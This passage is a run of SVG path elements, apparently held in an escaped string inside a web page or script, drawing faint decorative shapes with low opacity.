d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1672.05,77.23c-7.14,2.24-12.93-.67-18.27-5.13-2,1.79-4.39,3.18-5.58.06s-3.12-3.37-5.78-3.25a10.49,10.49,0,0,1-3.93-.59c-4.74-1.76-11.18.87-13.09,5.71a36,36,0,0,1-3.67-1.4c-3.2-1.64-4.49-1.26-6.49,2.07l.07.06.08,0c3.23.21,6.47.29,9.67.68,1,.13,2,1.08,3,1.65,2.17-.16,4-.47,3.94-3.46,0-1,1.46-2.37,2.55-2.75.7-.25,2,.95,2.9,1.6.54.37.87,1.24,1.42,1.38,5,1.3,10.1,2.46,15.14,3.74,2.52.64,5,1.52,7.51,2.18,1.6.42,3.25.65,4.88,1l1.9-1,4-1.18,1.11-.79a2.61,2.61,0,0,0-.08-.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1418.08,75.15l-2,1.17A2.8,2.8,0,0,1,1411.7,74c-.08-2.55-1.19-2.8-3.27-2-1.73.62-3.53,1-5.69,1.6-.74,2-1.7,4.51-2.34,6.2-2.42,0-5.09-.22-5.19.16a12.83,12.83,0,0,1-1.06,3c2.55.09,4.55-2.42,7.06-1.16.26-.38.5-.77.75-1.18.9-1.51,2.64-3.34,4.15-3.49a16.85,16.85,0,0,1,7.51,1.39c.92.37,1.21,2.37,2.16,4.46,1-3.19.65-6.75,4.61-6.79-.18-.64-.36-1.28-.59-2.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1521.68,67.32a3.24,3.24,0,0,0-2.29.3c-3.15,2.53-6.32,1.19-9.62.47-1.15-.26-2.56.65-3.85,1,3.86.44,7.7,1.08,11.57,1.25,4.37.19,8.78-.25,13.15,0,3.83.2,7.63.94,11.44,1.44a11.89,11.89,0,0,0-2.91-1.47C1533.35,69.22,1527.52,68.26,1521.68,67.32Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1432.47,69.35c-2.84-.79-6.83,2.34-7.59,5.52l9.91-2.57C1434,71.27,1433.44,69.62,1432.47,69.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1494.72,69.78c1.49-.63,3.52.08,5.31.07a7.58,7.58,0,0,0,1.93-.52L1491.9,68C1492.27,69.4,1492.31,70.81,1494.72,69.78Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1823.13,91.5c2.2,1.79,4.19,4,6.66,5.22,1.69.84,4.32,1.3,5.58-1.44-3-1.35-5.89-2.82-8.94-4C1825.5,90.94,1824.24,91.41,1823.13,91.5Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1803.27,96.36l-3.54-.31C1800.73,98.26,1801.87,98.73,1803.27,96.36Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.21,117.79l.45.23-.06-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1899.32,115.94l-1,1.4.9.45.39-.15C1899.5,117.07,1899.41,116.5,1899.32,115.94Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M829.91,17.17c3.32,1.48,6.16,4,8.5,5.66.69,2.1.83,4,1.82,5,.54.56,2.52-.25,3.85-.44L844,26.26l-3.13-1.57,1.68-4.79.52.89,5.46-.74c2.14,1.1,3.93,2,5.74,2.95,1.08.55,2.9.83,3.16,1.63,1.61,4.89,4.53,2.43,7.35,1.72a17.15,17.15,0,0,1,4.64,0c.77,0,1.59.45,2.3.29,3.48-.78,6.07.56,8.42,3s3.3,2.39,5.56-.86h0l0,0h0c-1.9-.49-4-.6-5.64-1.55-2.79-1.6-5.49-3-8.83-2.53a1.37,1.37,0,0,1-.67,0c-2.43-.85-4.8-2.09-7.29-2.46-2.32-.35-4.77.22-7.41.4.25-1.64.44-2.83.62-4l-5.58-2.33-1.28-.27c-1.13.42-2.29,1.24-3.4,1.17-2.26-.13-4.56-1.22-6.33,1.25a3.36,3.36,0,0,1-2-1,4.6,4.6,0,0,0-4.76-2.91c-2.65,0-5.3-.43-8-.67L823,12.54l-4,0-1.36,1.23a11.41,11.41,0,0,0,2.6,1.37C823.45,15.84,827,15.86,829.91,17.17Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M628.92,64.11a4,4,0,0,0,2.57-1.64c1.61-3.27,4-2.52,6.27-1.29,3.89,2.08,8,1.82,10.88-.64l6.54.81c.05.43.13,1.18.18,1.61,6.45-2.75,14.07-1.15,19.28-6.26,4,3.24,3.87,3.16,7.22-.54a4.35,4.35,0,0,1,3.43-.95c3.6.59,6.43-.35,8.67-3.28s3-2.8,5.56,0l2.38-2.67a13.59,13.59,0,0,0-3.13-1.19c-3.33-.42-3.45-2.07-2.27-4.71.34-.74-.37-1.91-.45-2.9s0-2.27,0-3.41c1.2,0,2.64-.41,3.55.12a30,30,0,0,1,4.4,3.71c-.4-.91-1.31-2-1.11-2.71.86-3.1-.42-3.09-2.93-2.79-1,.12-2.25-1.43-3.39-2.22a14.65,14.65,0,0,1,2.5-1.72c1.06-.45,2.31-.45,3.37-.89.76-.32,2-1.2,1.91-1.55a22.79,22.79,0,0,0-1.6-3.82L699,26c.5-1,.78-2.26,1.56-2.94a29.86,29.86,0,0,1,4.4-2.71c.47,1,1,1.58,1,2.15-.08,2.06.56,4.18,2.67,3.75,1.19-.24,2-2.77,2.79-4.36.27-.53-.11-1.35,0-2,.18-1.56.46-3.11.7-4.66l.94-.57c2.37,4.62,5.35,3.84,8.33,1.56,1.77-1.36,3.91-2.68,4.86-4.55,1.87-3.63,2.13-4,6.66-2.81l-1.71,4.17c2.19,0,3.65.07,5.11,0,2-.12,4.31,1,5.73-1.59.21-.39,2-.5,2.47-.08,2.2,1.88,4.7.78,7,1.14a74.34,74.34,0,0,1,7.66,2,7.56,7.56,0,0,0,1.82.32c1.35,0,2.9-.49,4,0,2.42,1,4.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path 